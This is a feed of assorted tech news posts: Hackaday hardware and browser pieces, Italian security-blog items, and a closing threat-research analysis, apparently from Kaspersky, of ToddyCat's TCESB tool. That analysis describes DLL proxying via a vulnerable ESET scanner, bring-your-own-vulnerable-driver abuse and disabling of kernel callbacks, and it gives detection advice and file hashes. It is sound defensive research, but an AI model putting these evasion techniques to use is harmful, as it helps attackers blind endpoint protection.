Well, you’d still have a clock. But you’d have to set it manually like some kind of Neanderthal. That wasn’t acceptable to [jim11662418], so after he yanked the misbehaving WWVB receiver from his clock, he decided to replace it with an ESP8266 that could connect to the Internet and get the current time via Network Time Protocol (NTP).

This modification was made all the easier by the fact that the WWVB receiver was its own PCB, connected to the clock’s main board by three wires: one for the clock signal, another that gets pulled low when the clock wants to turn on the receiver (usually these clocks only update themselves once a day), and of course, ground. It was simply a matter of connecting the ESP8266 dev board up to the two digital lines and writing some code that would mimic the responses from the original receiver.

If you take a look through the provided source code, a comment explains that the WWVB signal is recreated based on the official documentation from the National Institute of Standards and Technology (NIST) website. There are functions in the code to bang out the 500 ms “one” and 200 ms “zero” bits, and once the microcontroller has picked up the correct time from the Internet, they’re called in quick succession to build the appropriate time signal. As such, this code should work on any clock that has an external WWVB receiver like this, but as always, your mileage may vary.

This is a very clean hack, but if you wanted to pull off something similar without having to gut all the clocks in your house, we’ve seen a WWVB simulator that can broadcast an NTP-backed time signal to anything listening nearby.

hackaday.com/2025/04/07/atomic…

We’ve got a love-hate relationship with discount tool outlet Harbor Freight: we hate that we love it so much. Apparently, [James Clough] is of much the same opinion, at least now that he’s looked into the quality of their outlet strips and found it somewhat wanting.

The outlet strips in question are Harbor Freight’s four-foot-long, twelve-outlet strips, three of which are visible from where this is being written. [James] has a bunch of them too, but when he noticed an intermittent ground connection while using an outlet tester, he channeled his inner [Big Clive] and tore one of the $20 strips to bits. The problem appears to be poor quality of the contacts within each outlet, which don’t have enough spring pre-load to maintain connection with the ground pin on the plug when it’s wiggled around. Actually, the contacts for the hot and neutral don’t look all that trustworthy either, and the wiring between the outlets is pretty sketchy too. The video below shows the horrors within.

What’s to be done about this state of affairs? That’s up to you, of course. We performed the same test on all our outlets and the ground connections all seemed solid. So maybe [James] just got a bad batch, but he’s still in the market for better-quality strips. That’s going to cost him, though, since similar strips with better outlets are about four times the price of the Harbor Freight units. We did find a similar strip at Home Depot for about twice the price of the HF units, but we can’t vouch for the quality. As always, caveat emptor.

youtube.com/embed/z8YdOG9biKU?…

Thanks to [cliff claven] for the tip.

hackaday.com/2025/04/07/buyer-…

Afficionados of vintage electric organs will know about the Melotron, an instrument from the 1960s that had pre-recorded sounds on a bank of tape loops. A real Melotron in working order will set you back a bit, but it’s possible to play with the idea using much more attainable hardware. [Decurus] has made a simple tape based synth using a cassette deck.

It uses a loop of cassette tape, and varies the pitch by changing the speed of the cassette motor. There’s an RP2040 and a motor controller, which can take a MIDI signal and use it to drive the motor. We’re sorry to see that there’s no recording of the result, but it’s described as a drone.

Part of this project is a 3D printed tape loop holder to fit a cassette mechanism. We won’t go as far as to call it a cassette in itself, instead it’s a sort of tape loop frame. We can see that it might be an interesting component for other tape loop experimenters, now that cassettes themselves are no longer ubiquitous. This certainly isn’t the first tape pitch synth we’ve seen.

hackaday.com/2025/04/07/a-tiny…

Yeah, yeah — not a keyboard. But one keyboard-adjacent topic I’m certainly interested in is that of finding a satisfying mouse. Why settle for ticky micro-switches when you could have full-on thock in both peripherals?
My own personal peripherals. Banana mat for scale.
I’ve been using a Logitech Ergo M575 for a couple of years now. As you can see, it’s a trackball with two extra buttons, which come programmed for forward and back. I find this next to useless, so I employed AutoHotKey and changed them to Ctrl+C on the up switch, and Ctrl+V on the down switch.

[Aknup] commented on the previous Keebin’ and brought up MMO mice, which, I didn’t know those things had a name other than maybe ‘multi-button mice’. And yes, there are a few trackball MMOs out there. I’ve got my eye on a couple already.

Does anyone have a trackball MMO? I hate to spend $100+ on something I won’t like. I’m intrigued that the one I found that’s the most attractive is less a thumb trackball and more a two-fingers-at-once kind of situation. That will take some getting used to, but the way my trackball moves sometimes, it could be a really positive change.

Embrace the Jank, Why Don’t You?

[VideoPuzzleheaded884] built this keyboard over a the course of a few evenings for a total cost of around $30 AUD ($18.33 USD as of this writing), as a way to motivate themselves to finally start soldering.

Image by [VideoPuzzleheaded884] via redditI for one like the look of the acrylic plate, which was worked with a Dremel and hand tools. And the wiring looks fine to me, so I hesitate to actually call this janky myself. But [VideoPuzzleheaded884] did it for me.

You can tell [VideoPuzzleheaded884] is one of us — they cobbled this Corne mini layout-having keyboard together with stuff on hand, and did a fine job of soldering one of their first projects. Hey, if it works, it works. And the use of all-black wires should be commended.

The microcontroller is an ESP32-C3 [VideoPuzzleheaded884] found in box somewhere, and the switches are Gateron Silvers from an unknown time. All in all, this project was a fun diversion from programming, and this probably won’t be the last keyboard they solder.

The Centerfold: Alas, Poor Yorick; I Knew Thee Cozy Vibes Well

Image by [Ryuk_void666] via redditThis one’s all about the vibes, and not necessarily the peripherals. The keyboard is an Amazon UK number and the mouse is whatever, but the wrist rests sure look comfy, and the padding around the edge of the desk is divine.

The moon lamp looks great along with the fill light coming in from the right, and I could totally get down with some death metal and WFH with this setup.

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: Oh Maskelyne, Why Can’t You Be True?

What’s a magician to do if they need something to fall back on? Sell typewriters, I suppose. Why else would a father-and-son team of illusionists named John Nevil Maskelyne (Jr. and Sr.) do such a thing?
Image via ozTypewriter
The Maskelynes’ machine was initially seen at the Paris World’s Fair, which lasted from May to October 1889. Four years later, it finally hit the market.

The main selling point of the Maskelyne was that it offered differential spacing. Most typewriters output monospaced text — the skinny ‘i’ takes up the same width on the page as the ‘w’ does. On the Maskelyne, each character takes up a different amount of horizontal space. This makes for a nicer-looking document overall.

By 1897, the writing was on the wall. Maskelynes under heavy usage were falling apart. They were not built to withstand the vibration that typewriters must endure. As a result, things would go awry — maybe the escapement clutch no longer moved far enough, or went too far, or the bars needed to make differential spacing possible clashed together.

By the third model of Maskelyne, they did away with differential spacing. But the investors were unhappy, and by 1899, the Maskelyne Typewriter concern did a disappearing act.

ICYMI: Stop Me If You Saw This Keyboard

We’re embracing the jank this week, remember? And the end result of [nomolk]’s labor? Not janky at all.

Image by [nomolk] via YouTubeAfter sawing apart a perfectly good mechanical keyboard and re-connecting about 50 wires, [nomolk] managed to get it working again, and now has a true split keyboard. Be sure to watch the video!

This labor of love took almost three weeks, between rewiring all the broken connections and testing the wiring. [nomolk] tried it out and found it wasn’t working as expected, with some keys not registering, and other keys registering two characters.

Once it was working, [nomolk] had a fine mess of all-black wires (!) to deal with. Between the zip ties and the plastic spiral wire wrap thingy, the beast was eventually tamed. That Spacebar would drive me crazy, though.

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2025/04/07/keebin…

While low-cost professional PCB fabrication has largely supplanted making circuit boards at home, there’s still something to be said for being able to go from design to prototype in an afternoon. Luckily we aren’t limited to the old toner transfer trick for DIY boards these days, as CNC routers and powerful lasers can be used to etch boards quickly and accurately.

But there’s still a problem — those methods leave you with a board that has exposed traces. That might work in a pinch for a one-off, but such boards are prone to shorts, and frankly just don’t look very good. Which is why [Mikey Sklar] has been experimenting with applying both a soldermask and silkscreen to his homemade boards.

The process he describes starts after the board has already been etched. First he rolls on the soldermask, and then sandwiches the board between layers of transparency film and clear acrylic before curing it under a UV light. After two coats of the soldermask, the board goes into a fiber laser and the silkscreen and mask layers are loaded into the software and the machine is set to a relatively low power (here, 40%). The trick is that the mask layer is set to run four times versus the single run of the silkscreen, which ensures that the copper is fully exposed.

Since the board doesn’t need to be moved between operations, you don’t have to worry about the registration being off. The end result really does look quite nice, with the silkscreen especially popping visually a lot more than we would have assumed.

We’ve previously covered how [Mikey] uses his CNC router and fiber laser to cut out and etch the boards, so this latest installment brings the whole thing full circle. The equipment you’ll need to follow along at home isn’t cheap, but we can’t argue with the final results.

youtube.com/embed/RxKP0Fk902g?…

hackaday.com/2025/04/07/fiber-…

Chi si occupa di sicurezza informatica ricorderà bene l’attacco del gennaio 2022 contro la SIAE, la Società Italiana degli Autori ed Editori. All’epoca, il colpo fece molto scalpore: milioni di dati personali di artisti e iscritti vennero rubati e pubblicati sul dark web.

Responsabile di quell’attacco fu la cyber gang Everest, un gruppo di criminali informatici specializzati in estorsioni tramite ransomware. In quel frangente riuscimmo anche a intervistare alcuni membri della gang, raccogliendo dettagli sulle loro operazioni, la loro filosofia e, in parte, la loro arroganza nel raccontare quanto fosse “semplice” colpire realtà istituzionali.

Oggi, a distanza di oltre tre anni, la situazione si è capovolta. IlData Leak Site della gang Everest ha subito una battuta di arresto nel fine settimana. Qualcuno — probabilmente altri hacker o forse forze di polizia sotto copertura — ha violato il portale utilizzato dal gruppo per pubblicare i dati rubati alle loro vittime, lasciandolo irraggiungibile e sostituendolo con contenuti modificati.
Deface sul sito di everest di questo fine settimna (fonte techcrunch.com)

La soddisfazione di tutte le vittime

C’è una certa ironia nel vedere un gruppo di criminali informatici — che per anni ha terrorizzato aziende, enti pubblici e privati cittadini — diventare vittima delle stesse tecniche di cui si serviva.

La SIAE, che nel 2022 aveva subito pesanti danni sia in termini economici sia di immagine, può oggi concedersi una piccola soddisfazione morale: gli hacker che l’avevano umiliata, ora si trovano a loro volta esposti e vulnerabili.

Il concetto di karma digitale si manifesta perfettamente in casi come questo. Everest, come molte gang ransomware, aveva costruito il proprio potere sulla paura: chi non pagava il riscatto veniva minacciato con la pubblicazione di documenti riservati.

L’attacco all’infrastruttura di Everest avviene in un contesto di mutevoli tendenze globali del ransomware. Mentre gli attacchi ransomware ed estorsivi sono aumentati in generale, recenti report indicano che i pagamenti alle vittime sono diminuiti in modo significativo nel corso del 2024. Questo declino è attribuito alle aziende che adottano strategie di backup più efficaci e si rifiutano di negoziare con gli aggressori.

Anche le forze dell’ordine hanno intensificato gli sforzi contro i gruppi ransomware, riuscendo negli ultimi mesi a interrompere le operazioni di importanti attori come LockBit e Radar. Va anche detto che, negli ultimi anni, le autorità internazionali hanno intensificato la loro lotta contro il cybercrime organizzato. Operazioni come quella contro Emotet, Conti e LockBit dimostrano che nessuno, nemmeno i criminali più sofisticati, può sentirsi al sicuro per sempre.

Un segnale al mondo del cybercrime

L’hack subito da Everest manda un messaggio chiaro a tutto l’ecosistema del ransomware: il crimine informatico non è immune alla vulnerabilità e che si domanda se utilizzare il ransomware possa essere controproducente nelle operazioni.

Anche i gruppi più temuti possono crollare se sottovalutano la loro sicurezza o se si trovano a fronteggiare avversari decisi quanto loro. Per chi lavora ogni giorno per proteggere dati e infrastrutture, è un raro momento di rivincita.

Non sappiamo ancora chi ci sia dietro l’attacco al sito di Everest. Potrebbe essere un’azione isolata di hacktivisti, una vendetta da parte di ex membri, o parte di un’operazione più ampia guidata da forze di intelligence. Qualunque sia la mano che ha colpito, resta il gusto amaro — per Everest — di subire lo stesso destino che hanno inflitto a tanti.

L'articolo La SIAE prende la sua Rivincita! I Criminali Informatici di Everest sono stati Hackerati proviene da il blog della sicurezza informatica.

Over the history of the Web, we have seen several major shifts in browsing software. If you’re old enough to have used NCSA Mosaic or any of the other early browsers, you probably welcomed the arrival of Netscape Navigator, and rued its decline in the face of Internet Explorer. As Mozilla and then Firefox rose from Netscape’s corpse the domination by Microsoft seemed inevitable, but then along came Safari and then Chrome. For a glorious while there was genuine competition between browser heavyweights, but over the last decade we’ve arrived at a point where Chrome and its associated Google domination is the only game in town. Other players are small, and the people behind Firefox seem hell-bent on fleeing to the Dark Side, so where should we turn? Is there a privacy-centric open source browser that follows web standards and doesn’t come with any unfortunate baggage in the room? It’s time to find out.

It’s All In The Engine

It’s Hackaday, in NetSurf!
If you look at the breadth of standards which a modern web browser has to support, it’s clear that writing a web browser is a Herculean task. Many browsers take the route of not trying to implement everything, for example minimalist browsers such as Dillo or NetSurf concentrate only on rendering web pages. For the purposes of this piece we’re looking at full-fat browsers capable of being a daily driver though, and for that a browser needs some very capable software. Many development teams are not capable of writing such a browser engine, and thus use one developed for another browser. Despite there being many names on the table then, peering under the hood there are surprisingly few options. The Apple Webkit and Google Blink family of browsers dominate, followed by Mozilla Gecko and its Goanna fork, and then by promising bit-part players such as Servo, or the Ladybird browser’s LibWeb. Having so much of the web’s browser software dominated by Apple and Google is not an ideal situation, but it’s where we find ourselves.
It’s Hackaday, in Ladybird!
So when choosing a browser, the first thing we look at is its engine. Whose ecosystem are we becoming part of, and does that have any effect on us? Within reason all modern full-featured browser engines render websites the same, so there should be little to choose from in terms of the websites themselves.

Having considered the browser engine, next up are whatever the developer uses to differentiate themselves. It’s suprisingly straightforward to construct a bare-bones web browser on top of WebKit, so to stand out each browser has a unique selling point. Is it privacy you’re after, ad blocking, or just following a UI path abandoned by a previous browser? And perhaps most importantly, are you simply departing a problematic developer for one even shadier? It’s worth doing your homework, and not being afraid to try multiple browsers before you find your home.

So Where Did Hackaday Land?

It’s Hackaday, in Vivaldi! (We are sure you are getting the idea by now)
Over the course of writing for Hackaday it’s inevitable that a bunch of different browsers will find their way on to my bench. Some of them like Ladybird or Servo I would love the chance to use as my daily driver, but they simply aren’t mature enough for my needs. Others such as Brave have too much of a whiff of controversy around them for someone seeking a quiet life of open-source obscurity. As I write this I have a preposterous number of browsers installed on my machine, and if there’s one thing which the experience has taught me it’s that they are much more the same than I expected. In three decades our expectation of a browser has homogenised to the extent that I’m hard pressed to tell between them. How do I pick one, without blindly throwing a dart at a corkboard covered in browser logos?

In the end, I looked for two candidates, one each from the Firefox and Apple/Google orbits. I tried them all, and settled on LibreWolf from the former, and Vivaldi from the latter. LibreWolf because it’s done a fine job of making Firefox without it being Firefox, and Vivaldi because its influence from the early Opera versions gave it a tiny bit of individuality missing in the others. I set up both with my usual Hackaday bookmarks, tabs, and shortcuts, changed the search engine to the EU-based Qwant. I’m ready to go, with a bit more control over how my data is shared with the world once more.

A refugee from the early Web writes…

It’s a fairly regular occurrence, that I will Do a Linux Thing in my hackerspace, only to have one of my younger friends point out a much newer and better tool than the one I know, which I probably learned to use some time in the mid-1990s. I’ve fond looking at web browsers to be in some respects a similar experience even if the browsers are much closer to each other than I expected, because for a couple of decades now I’ve been a Firefox user simply because Firefox was the plucky upstart open-source browser. Mozilla’s previous attempts to take Netscape 6 and make it the only piece of Internet software you needed were horribly bloated, and Firefox, or “Phoenix” as it launched, was an easy choice. Just as my operating system journey taught me about software complacency a couple of years ago, so I’ve now had the same awakening in the browser. The Web will never look the same again.

hackaday.com/2025/04/07/which-…

WELCOME BACK, THIS IS DIGITAL POLITICS. I'm Mark Scott, and I've returned to my desk after a blissful week of vacation. For those in Brussels, I'll be in town on April 29-30, May 6-7 and May 14-15 if anyone is around — drop me a line on digitalpolitcs@protonmail.com

— A global trade war is heating up. Technology will inevitably get sucked into the chaos. But don't expect digital services to play a big role, at least not at first.

— US President Donald Trump extended the sale/ban of TikTok's American operations for another 75 days. That doesn't solve any of the underlying problems.

— How different generations consume (online) media is becoming more divided, leaving us with little, if any, common culture upon which to rely.

Let's get started:

digitalpolitics.co/newsletter0…

Using USB for powering devices is wonderful, as it frees us from a tangle of incompatible barrel & TRS connectors, not to mention a veritable gaggle of proprietary power connectors. The unfortunate side-effect of this is that the obvious thing to do with power connectors is to introduce splitters, which can backfire horribly, especially since USB-C and USB Power Delivery (USB-PD) were introduced. The [Quiescent Current] channel on YouTube recently went over the ways in which these handy gadgets can literally turn your USB-powered devices into a smoldering pile of ashes.

Much like Qualcomm’s Quick Charge protocols, USB-PD negotiates higher voltages with the power supply, after which this same voltage will be provided to any device that’s tapped into the power supply lines of the USB connector. Since USB-C has now also taken over duties like analog audio jacks, this has increased the demand for splitters, but these introduce many risks. Unless you know how these splitters are wired inside, your spiffy smartphone may happily negotiate 20V that will subsequently fry a USB-powered speaker that was charging off the same splitter.

In the video only a resistor and LED were sacrificed to make the point, but in a real life scenario the damage probably would be significantly more expensive.

youtube.com/embed/lvnoz5uaTwE?…

hackaday.com/2025/04/07/why-us…

Un team di ricercatori del Feinstein Institute for Medical Research di New York ha compiuto notevoli progressi nella creazione di sistemi di interazione cervello-macchina. Da anni gli esperti lavorano per imparare a leggere l’attività cerebrale dei pazienti paralizzati e utilizzare tali dati per riprendere il controllo del loro corpo. Tuttavia, il controllo del movimento da solo risolve solo metà del problema: senza feedback tattile, anche azioni semplici come prendere una tazza diventano praticamente impossibili da eseguire.

Il vicepresidente per la ricerca avanzata presso l’istituto Feinstein Institutes for Medical Research Chad Bouton e i suoi colleghi creano interfacce cervello-computer da diversi anni. Nel 2015 la squadra presentato il sistema di “bypass neurale”. Un chip dotato di una serie di elettrodi è stato impiantato nella corteccia motoria del paziente. Il sensore registra gli impulsi nervosi e un modello di intelligenza artificiale appositamente addestrato li decodifica trasformandoli in intenzioni di eseguire un movimento particolare. Grazie ai segnali elettrici, un uomo paralizzato poteva muovere il braccio semplicemente pensandoci.

Negli ultimi dieci anni la tecnologia si è evoluta notevolmente. L’ultimo sviluppo è chiamato “doppio bypass neurale“. Oltre a leggere i segnali cerebrali, ora stimola anche le aree responsabili del tatto. Per realizzare il progetto, gli specialisti hanno impiantato cinque microchip nel cervello del paziente Keith Thomas, che aveva perso la mobilità nella parte inferiore del torace a seguito di un infortunio durante un’immersione. Sono stati posizionati due array di elettrodi nella corteccia motoria; l’aumento del numero di sensori ha consentito un’analisi più accurata dei movimenti pianificati. Altri tre chip sono stati installati nell’area somatosensoriale, che elabora le sensazioni tattili. Il numero totale degli elettrodi ha raggiunto quota 224.

L’intelligenza artificiale è stata addestrata per trasformare i segnali cerebrali di Thomas in comandi di controllo. Le informazioni provenienti dalla corteccia motoria vengono decodificate dal sistema e trasmesse a una matrice di elettrodi fissati al collo, che stimola il midollo spinale. Parallelamente, agiscono gli elettrodi sull’avambraccio, attivando i muscoli che controllano la mano.

I risultati hanno superato le aspettative. Se all’inizio Thomas riusciva a malapena a sollevare il braccio sopra il bracciolo della sedia a rotelle, dopo aver collegato la stimolazione del midollo spinale tramite elettrodi cervicali, la sua forza muscolare è aumentata in modo significativo. Ora il paziente è in grado di raggiungere il proprio viso in modo autonomo.

Un ruolo particolare lo svolgono i sensori miniaturizzati sulle dita e sui palmi delle mani: trasmettono i dati relativi alla pressione e al tatto al computer, che attiva le aree corrispondenti della corteccia somatosensoriale. Il feedback ripristinato ha permesso al paziente non solo di percepire il tatto, ma anche di utilizzare queste informazioni nell’esecuzione di azioni precise. Ora Thomas può raccogliere i gusci d’uovo vuoti senza danneggiarne la fragile struttura.

Il sistema consente al paziente di sollevare la tazza e di bere da essa, guidato solo dall’intenzione mentale. Sorprendentemente, anche senza essere connesso all’interfaccia neurale, Thomas conserva la sensibilità nell’avambraccio e nel polso. Il meccanismo fisiologico di questo fenomeno rimane un mistero: forse, grazie alla neuroplasticità del cervello, si formano nuove connessioni neurali.

Bouton cita esperimenti sugli animali in cui la stimolazione elettrica promuoveva la crescita dei neuroni. Tuttavia, nel caso degli esseri umani, i miglioramenti potrebbero essere associati anche al rafforzamento delle connessioni superstiti nel sito della lesione del midollo spinale.

L'articolo Cinque Microchip per Tornare a Vivere: La Storia di Keith Thomas e il Futuro della Neurotecnologia proviene da il blog della sicurezza informatica.

To hide their activity in infected systems, APT groups resort to various techniques to bypass defenses. Most of these techniques are well known and detectable by both EPP solutions and EDR threat-monitoring and response tools. For example, to hide their activity in Windows systems, cybercriminals can use kernel-level rootkits, in particular malicious drivers. However, in the latest versions of Windows, kernel-mode drivers are loaded only if digitally signed by Microsoft. Attackers get round this protection mechanism by using legitimate drivers that have the right signature, but contain vulnerable functions that allow malicious actions in the context of the kernel. Monitoring tools track the installation of such drivers and check applications that perform it. But what if a security solution performs unsafe activity? Such software enjoys the trust of monitoring tools and doesn’t raise suspicions.

And that’s precisely what ToddyCat attackers exploited by running their tool in the context of a security solution.

Detection

In early 2024, while investigating ToddyCat-related incidents, we detected a suspicious file named
version.dll in the temp directory on multiple devices.
This 64-bit DLL, written in C++, turned out to be a complex tool called TCESB. Previously unseen in ToddyCat attacks, it is designed to stealthily execute payloads in circumvention of protection and monitoring tools installed on the device.

Kaspersky products detect this tool as
Trojan.Win64.ToddyCat.a, Trojan.Win64.ToddyCat.b.

Loading the tool

DLL proxying

Static analysis of the DLL library showed that all functions exported by it import functions with the same names from the system file
version.dll (Version Checking and File Installation Libraries).

List of functions exported by TCESB

This indicates that the attackers use a DLL-proxying technique (Hijack Execution Flow, T1574) to run the malicious code. By means of this technique, a malicious DLL exports all functions of a legitimate one, but instead of implementing them, redirects calls to these functions to the original DLL. This way, an application that loads the malicious library will continue to work as normal, with the malicious code running in the context of this application in the background.

Schematic of DLL proxying

However, this is not enough to launch malware. For a malicious DLL to be able to take control, the application that loads it must contain insecure code. Such code searches for loaded dynamic library images in folders where they should not be located. If one of these folders contains a malicious library, the vulnerable application will load it instead of the legitimate one. Microsoft has an official advisory on preventing unsafe DLL loading.

CVE-2024-11859 vulnerability in ESET Command line scanner

It took us a while to find the file that loads the TCESB tool. We studied the system directories on devices where the malicious DLLs were found. On one of these, in the same folder as TCESB, there was an extensionless executable file named
ecls. We believe that the operator, when transferring files to the device, made a mistake in the filename and moved two copies of it. After performing malicious activity, the file with the extension was deleted, while the other one remained in the system. This file turned out to be a component of ESET’s EPP solution – a scanner launched from the command line (ESET Command line scanner). Dynamic analysis showed that the scanner insecurely loads the system library version.dll, first checking for the file in the current directory, then searching for it in the system directories. This can result in a malicious DLL library being loaded, which constitutes a vulnerability. We compiled a report with a detailed description of it, and sent it to ESET as part of the Coordinated Vulnerability Disclosure process. ESET registered the CVE-2024-11859 vulnerability, then on January 21, 2025 released an update for the ecls file patching the security issue. On April 4, information about this vulnerability appeared in an ESET security advisory.
To analyze TCESB, we ran it in a virtual environment. In the address space of the ESET Command-line scanner process, we can see two
version.dll files. One is the system library, the other is the DLL of the TCESB tool.

Malicious and legitimate libraries in the memory of the ecls.exe process

Basic functionality

To determine the main functions of the malicious tool, we examined the strings located in its DLL.

Snippet of the list of strings that TCESB contains

The strings are not obfuscated. The search shows that most of them belong to the open-source malicious tool EDRSandBlast, designed to bypass security solutions. Kaspersky solutions detect it with the verdict
HEUR:HackTool.Win64.EDRSandblast.a. ToddyCat created the TCESB DLL on its basis, modifying the original code to extend the malware’s functionality. The resulting tool’s capabilities include modifying operating system kernel structures to disable notification routines, for example, about a process creation event in the system or a load event.

Searching for addresses in the kernel memory

To find the structures in the kernel memory needed to disable notification routines, TCESB determines the version of the Windows kernel in the context of which it is running. To do this, it uses the
GetNtoskrnlVersion() function.

Function for getting the Windows kernel version implemented in TCESB

Next, to get information about the memory offsets of the structures corresponding to the operating system kernel version, TCESB uses one of two data sources: a CSV or PDB file.

First, the tool checks the CSV file contained in its own resources section. Stored there in table form is information about several popular kernel versions and their corresponding offsets.

TCESB searches this file line by line for a match with the previously obtained version of the current Windows kernel.

Snippet of the function for getting and reading a CSV file from TCESB resources

We studied the CSV file in the EDRSandBlast repository and its change history. The contents of the TCESB CSV fully match the CSV data in the EDRSandBlast version of August 13, 2022, while the original malware commit of October 6, 2023 adds lines that are missing in the TCESB resource. This indicates a time period during which the creators of TCESB used the EDRSandBlast code.

If the CSV file does not contain data on structures corresponding to the required kernel version, TCESB reads their addresses from the PDB file. To get it, the malware accesses the file C:\Windows\System32\ntoskrnl.exe, which contains information about the kernel file version, and inserts the data from this file into the following template, generating a URL:
msdl.microsoft.com/download/sy…
This is the address of Microsoft debug information server, where TCESB sends a GET request to download the PDB file. The received file is saved in the current TCESB directory, and data on the offsets of the required kernel memory structures are read from it.

Vulnerable driver

To modify the kernel structures that store callbacks used to notify applications of system events, TCESB deploys the Bring Your Own Vulnerable Driver (BYOVD) technique (Exploitation for Defense Evasion, T1211). It does this by installing a vulnerable driver in the system through the Device Manager interface, using an INF file with installation information.

Snippet of decompiled code for installing the TCESB driver

TCESB uses the Dell DBUtilDrv2.sys driver, which contains the CVE-2021-36276 vulnerability. This is a utility driver used to update PC drivers, BIOS and firmware.

Launching the payload

Once the vulnerable driver is installed in the system, TCESB runs a loop in which it checks every two seconds for the presence of a payload file with a specific name in the current directory – the payload may not be present at the time of launching the tool. Presumably, this is to allow the operator to verify that the tool was run without errors, so that the payload file can be moved without risk of detection. As soon as the file appears in the path being checked, it is passed to the decryption function.

Snippet of decompiled TCESB code

The tool creates its own log file for recording all stages of execution in detail.

Example of log file contents

We studied two samples of the TCESB tool. Although we were unable to obtain the payload files, our research shows that they have different names (
kesp and ecore) and both are extensionless.
Our analysis of the tool code found that the data in the payload file is encrypted using AES-128.

Snippet of code for determining the encryption algorithm

The decryption key is in the first 32 bytes of the payload file, followed by the encrypted data block. Below is a snippet of code for reading the key:

Snippet of code for reading the key from the payload file

The key decrypts the data block:

Snippet of code for reading and decrypting the payload file

The read data is placed in memory and executed.

Takeaways

We discovered a sophisticated tool that the ToddyCat APT group tried to use for stealth execution in compromised systems. This tool exploits a chain of vulnerabilities, as well as an old version of a known open-source malware that the attackers modified to extend its functionality.

Schematic of tool operation

To detect the activity of such tools, it’s recommended to monitor systems for installation events involving drivers with known vulnerabilities. Lists of such drivers can be found on the loldrivers project website, for example. It’s also worth monitoring events associated with loading Windows kernel debug symbols on devices where debugging of the operating system kernel is not expected. We also advise using operating system tools to check all loaded system library files for the presence of a digital signature.

Indicators of compromise

Malicious Files Hashes

D38E3830C8BA3A00794EF3077942AD96
version.dll008F506013456EA5151DF779D3E3FF0F version.dll

Legitimate file for DLL proxying

8795271F02B30980EBD9950FCC141304 ESET Command-line scanner

Legitimate files for BYOVD

B87944DCC444E4C6CE9BB9FB8A9C0DEF
dbutildrv2.INFDE39EE41D03C97E37849AF90E408ABBE DBUtilDrv2.catDACB62578B3EA191EA37486D15F4F83C dbutildrv2.sys

securelist.com/toddycat-apt-ex…